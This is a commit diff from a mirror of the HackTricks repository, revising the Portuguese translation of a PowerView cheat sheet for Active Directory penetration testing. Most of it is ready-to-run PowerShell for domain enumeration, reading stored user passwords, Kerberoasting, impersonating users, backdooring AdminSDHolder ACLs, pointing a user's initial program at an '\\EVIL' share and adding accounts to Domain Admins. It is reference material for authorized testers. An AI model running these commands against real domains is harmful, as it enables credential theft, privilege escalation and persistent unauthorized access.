Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-24 05:33:33 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['windows-hardening/basic-powershell-for-pentesters/powerview

Browse source
This commit is contained in:
Translator 2024-01-04 09:05:34 +00:00
parent 3f81542d8c
commit 55fd9c2223
1 changed files with 30 additions and 34 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

64
windows-hardening/basic-powershell-for-pentesters/powerview.md
View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Trabalha numa **empresa de cibersegurança**? Quer ver a sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**material oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o repositório [hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
A versão mais atualizada do PowerView sempre estará no ramo dev do PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
A versão mais atualizada do PowerView estará sempre na branch dev do PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
[**SharpView**](https://github.com/tevora-threat/SharpView) é uma porta .NET do [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
[**SharpView**](https://github.com/tevora-threat/SharpView) é um port em .NET do [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
### Enumeração rápida
```powershell
@ -67,10 +67,10 @@ Get-DomainPolicyData # Same as Get-DomainPolicy
Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller
Get-NetDomainController -Domain mydomain.local #Get all ifo of specific domain Domain Controller
# Get Forest info
# Get Forest info
Get-ForestDomain
```
### Usuários, Grupos, Computadores e OUs
### Usuários, Grupos, Computadores & OUs
```powershell
# Users
## Get usernames and their groups
@ -98,7 +98,7 @@ Get-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodeleg
Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
}
# Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
## Users with this flag might have empty passwords (if allowed) or shorter passwords
@ -106,7 +106,7 @@ Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useracco
#Groups
Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
## Get-DomainGroup is similar to Get-NetGroup
## Get-DomainGroup is similar to Get-NetGroup
Get-NetGroup #Get groups
Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
Get-NetGroup 'Domain Admins' #Get all data of a group
@ -136,7 +136,7 @@ Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -
Get-NetOU #Get Organization Units
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
```
### Login e Sessões
### Logon e Sessões
```powershell
Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
Get-NetSession -ComputerName <servername> #Get active sessions on the host
@ -144,10 +144,10 @@ Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the mom
Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
```
### Objeto de Diretiva de Grupo - GPOs
### Objeto de Política de Grupo - GPOs
Se um invasor tiver **privilégios elevados sobre um GPO**, ele pode ser capaz de **elevar privilégios** abusando dele, **adicionando permissões a um usuário**, **adicionando um usuário administrador local** a um host ou **criando uma tarefa agendada** (imediata) para executar uma ação.\
Para [**mais informações sobre isso e como abusar disso, siga este link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
Se um atacante tem **privilégios elevados sobre um GPO**, ele poderia ser capaz de **escalar privilégios** abusando dele ao **adicionar permissões a um usuário**, **adicionar um usuário admin local** a um host ou **criar uma tarefa agendada** (imediata) para realizar uma ação.\
Para [**mais informações sobre isso e como abusar, siga este link**](../active-directory-methodology/acl-persistence-abuse/#gpo-delegation).
```powershell
#GPO
Get-DomainGPO | select displayName #Check the names for info
@ -181,7 +181,7 @@ Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
# Enumerates the machines where a specific domain user/group is a member of a specific local group.
Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
```
Aprenda como **explorar permissões em GPOs e ACLs** em:
Aprenda a **explorar permissões sobre GPOs e ACLs** em:
{% content-ref url="../active-directory-methodology/acl-persistence-abuse/" %}
[acl-persistence-abuse](../active-directory-methodology/acl-persistence-abuse/)
@ -203,12 +203,12 @@ Get-PathAcl -Path "\\dc.mydomain.local\sysvol"
Find-InterestingDomainAcl -ResolveGUIDs
#Check if any of the interesting permissions founds is realated to a username/group
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
#Get special rights over All administrators in domain
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
```
### Arquivos e pastas compartilhados
### Arquivos e pastas compartilhadas
```powershell
Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
Find-DomainShare -CheckShareAccess #Search readable shares
@ -224,14 +224,14 @@ Get-DomainTrustMapping #Enumerate also all the trusts
Get-ForestDomain # Get basic forest info
Get-ForestGlobalCatalog #Get info of current forest (no external)
Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)
Get-DomainForeingUser #Get users with privileges in other domains inside the forest
Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
```
### Frutas penduradas **baixas**
### Frutas de fácil alcance
```powershell
#Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
@ -269,34 +269,30 @@ Invoke-UserHunter -GroupName "RDPUsers"
#It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)
Invoke-UserHunter -Stealth
```
### Objetos deletados
### Objetos excluídos
```powershell
#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
```
### MISC
### DIVERSOS
#### SID para Nome
```powershell
"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
```
#### Kerberoast
O Kerberoast é uma técnica de ataque que explora a vulnerabilidade do Kerberos, um protocolo de autenticação utilizado em ambientes Windows. O ataque consiste em extrair hashes de senha de contas de serviço que utilizam o Kerberos como método de autenticação. Esses hashes podem ser posteriormente quebrados e utilizados para obter acesso não autorizado a sistemas e informações sensíveis.
O Powerview possui uma função específica para realizar o Kerberoasting, chamada `Invoke-Kerberoast`. Essa função pode ser utilizada para extrair hashes de senha de contas de serviço que possuem o atributo `ServicePrincipalName` definido. Para executar o ataque, basta executar o comando `Invoke-Kerberoast` e salvar os hashes em um arquivo para posterior quebra de senha.
```powershell
Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
```
#### Usar credenciais diferentes (argumento)
#### Utilizar credenciais diferentes (argumento)
```powershell
# use an alterate creadential for any function
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainUser -Credential $Cred
```
#### Impersonar um usuário
#### Personificar um usuário
```powershell
# if running in -sta mode, impersonate another credential a la "runas /netonly"
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
@ -311,7 +307,7 @@ Invoke-RevertToSelf
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
# Set the owner of 'dfm' in the current domain to 'harmj0y'
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
# ackdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
# Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
# Add user to 'Domain Admins'
Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
@ -320,10 +316,10 @@ Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) **grupo do Discord** ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
* Trabalha numa **empresa de cibersegurança**? Quer ver a sua **empresa anunciada no HackTricks**? ou quer ter acesso à **versão mais recente do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* Adquira o [**material oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o repositório [hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>